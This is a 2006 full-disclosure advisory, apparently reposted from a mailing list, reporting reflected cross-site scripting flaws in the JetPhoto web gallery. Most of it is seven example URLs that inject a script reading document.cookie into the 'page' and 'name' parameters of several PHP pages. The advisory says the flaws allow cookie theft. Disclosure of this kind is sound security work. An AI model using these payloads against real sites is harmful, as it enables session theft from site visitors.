[Full-disclosure] JetPhoto Multiple Cross-Site Scripting Vulnerabilitie

2006-04-11T00:00:00
ID SECURITYVULNS:DOC:12159
Type securityvulns
Reporter Securityvulns
Modified 2006-04-11T00:00:00

Description

Advisory #11 Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilitie

Author: 0o_zeus_o0 ( Arturo Z. )

Contact: zeus@diosdelared.com

Website: www.elitemexico.org

Date: 10/04/06

Risk: Medium

Vendor Url: http://www.jetphotosoft.com

Affected Software: JetPhoto

Non Affected:

Info:

this bug consists of inserting script in the line of execution of

the affected system causing the robbery of cookie

Example XSS:

http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=webalbum&page=<script>alert(

document.cookie);</script>

http://www.vuln.com/[path]/view/Classic.view/thumbnail.php?name=JetPhoto_Album&page=<script>alert(

document.cookie);</script>

http://www.vuln.com/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(

document.cookie);</script>

http://www.vuln.com/[path]/view/Classic.view/detail.php?name=JetPhoto_Album&page=<script>alert(

document.cookie);</script>

http://www.vuln.com/[path]/view/Orange.view/slideshow.php?name=<script></script><script>alert(

document.cookie);</script>

http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(

document.cookie);</script>

http://www.vuln.com/[path]/view/Orange.view/detail.php?name=1&page=<script>alert(

document.cookie);</script>

Solution:

VULNERABLE VERSIONS

all

Contact information

0o_zeus_o0

zeus@diosdelared.com

www.elitemexico.org

greetz: lady fire,Mi beba, olimpus klan team and elitemexico

original advisorie: http://www.elitemexico.org/11.txt